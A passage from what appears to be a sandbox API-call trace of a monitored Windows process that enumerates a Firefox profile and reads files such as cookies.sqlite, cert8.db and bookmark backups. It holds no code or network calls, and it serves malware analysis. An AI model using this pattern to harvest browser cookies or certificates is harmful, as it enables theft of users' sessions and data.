(lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.627] CloseHandle (hObject=0x4c8) returned 1 [0590.627] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.627] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbdb [0590.627] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.628] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.628] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.628] CloseHandle (hObject=0x660) returned 1 [0590.628] CloseHandle (hObject=0x4c8) returned 1 [0590.628] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.628] LocalFree (hMem=0x5e6108) returned 0x0 [0590.628] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 0 [0590.628] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0590.628] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.628] LocalFree (hMem=0x56cab0) returned 0x0 [0590.628] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.628] lstrlenW (lpString="\\") returned 1 [0590.628] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.628] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.628] lstrlenW (lpString="cert8.db") returned 8 [0590.628] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.628] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63bbf0 [0590.628] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.628] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.628] CloseHandle (hObject=0x5ac) returned 1 [0590.628] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x55 [0590.628] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63bd28 [0590.628] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db", lpDst=0x63bd28, nSize=0x55 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db") returned 0x55 [0590.628] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.629] CloseHandle (hObject=0x5ac) returned 1 [0590.629] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.629] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0590.629] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.629] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.629] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.630] CloseHandle (hObject=0x4c8) returned 1 [0590.630] CloseHandle (hObject=0x5ac) returned 1 [0590.630] LocalFree (hMem=0x63bd28) returned 0x0 [0590.630] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.630] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.630] lstrlenW (lpString="\\") returned 1 [0590.630] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.630] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.630] lstrlenW (lpString="compatibility.ini") returned 17 [0590.630] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.630] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56cab0 [0590.630] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.630] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.630] CloseHandle (hObject=0x5ac) returned 1 [0590.630] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5e [0590.630] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x5dbdf0 [0590.630] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini", lpDst=0x5dbdf0, nSize=0x5e | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini") returned 0x5e [0590.630] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.630] CloseHandle (hObject=0x5ac) returned 1 [0590.630] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.630] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xce [0590.630] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.630] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.631] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.631] CloseHandle (hObject=0x4c8) returned 1 [0590.631] CloseHandle (hObject=0x5ac) returned 1 [0590.631] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.631] LocalFree (hMem=0x56cab0) returned 0x0 [0590.631] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.631] lstrlenW (lpString="\\") returned 1 [0590.631] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.631] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.631] lstrlenW (lpString="content-prefs.sqlite") returned 20 [0590.631] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.631] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5e6108 [0590.631] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.631] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.631] CloseHandle (hObject=0x5ac) returned 1 [0590.631] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x61 [0590.631] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x63f8c8 [0590.631] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite", lpDst=0x63f8c8, nSize=0x61 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite") returned 0x61 [0590.631] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.631] CloseHandle (hObject=0x5ac) returned 1 [0590.631] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.631] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x38000 [0590.631] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.631] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.632] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.634] CloseHandle (hObject=0x4c8) returned 1 [0590.634] CloseHandle (hObject=0x5ac) returned 1 [0590.634] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.634] LocalFree (hMem=0x5e6108) returned 0x0 [0590.634] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.634] lstrlenW (lpString="\\") returned 1 [0590.634] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.634] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.634] lstrlenW (lpString="cookies.sqlite") returned 14 [0590.634] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.634] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.634] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.634] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.634] CloseHandle (hObject=0x5ac) returned 1 [0590.634] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.634] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5dbdf0 [0590.634] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite", lpDst=0x5dbdf0, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite") returned 0x5b [0590.634] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.634] CloseHandle (hObject=0x5ac) returned 1 [0590.634] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.634] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x80000 [0590.634] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.634] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0590.637] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0590.644] CloseHandle (hObject=0x4c8) returned 1 [0590.644] CloseHandle (hObject=0x5ac) returned 1 [0590.644] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.644] LocalFree (hMem=0x56cab0) returned 0x0 [0590.644] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.644] lstrlenW (lpString="\\") returned 1 [0590.644] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.644] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.644] lstrlenW (lpString="downloads.sqlite") returned 16 [0590.644] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.644] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56cab0 [0590.644] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.644] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.644] CloseHandle (hObject=0x5ac) returned 1 [0590.644] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5d [0590.644] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x5dbdf0 [0590.644] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite", lpDst=0x5dbdf0, nSize=0x5d | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite") returned 0x5d [0590.644] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.644] CloseHandle (hObject=0x5ac) returned 1 [0590.644] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.644] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18000 [0590.644] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.644] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.645] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.645] CloseHandle (hObject=0x4c8) returned 1 [0590.645] CloseHandle (hObject=0x5ac) returned 1 [0590.646] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.646] LocalFree (hMem=0x56cab0) returned 0x0 [0590.646] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.646] lstrlenW (lpString="\\") returned 1 [0590.646] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.646] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.646] lstrlenW (lpString="extensions.ini") returned 14 [0590.646] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.646] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.646] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.646] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.646] CloseHandle (hObject=0x5ac) returned 1 [0590.646] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.646] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5dbdf0 [0590.646] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini", lpDst=0x5dbdf0, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini") returned 0x5b [0590.646] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.646] CloseHandle (hObject=0x5ac) returned 1 [0590.646] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.646] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8d [0590.646] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.646] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.646] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.646] CloseHandle (hObject=0x4c8) returned 1 [0590.647] CloseHandle (hObject=0x5ac) returned 1 [0590.647] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.647] LocalFree (hMem=0x56cab0) returned 0x0 [0590.647] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.647] lstrlenW (lpString="\\") returned 1 [0590.647] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.647] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.647] lstrlenW (lpString="extensions.sqlite") returned 17 [0590.647] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.647] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56cab0 [0590.647] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.647] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.647] CloseHandle (hObject=0x5ac) returned 1 [0590.647] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5e [0590.647] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x5dbdf0 [0590.647] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite", lpDst=0x5dbdf0, nSize=0x5e | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite") returned 0x5e [0590.647] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.647] CloseHandle (hObject=0x5ac) returned 1 [0590.647] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.647] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x70000 [0590.647] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.647] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3680000 [0590.649] UnmapViewOfFile (lpBaseAddress=0x3680000) returned 1 [0590.651] CloseHandle (hObject=0x4c8) 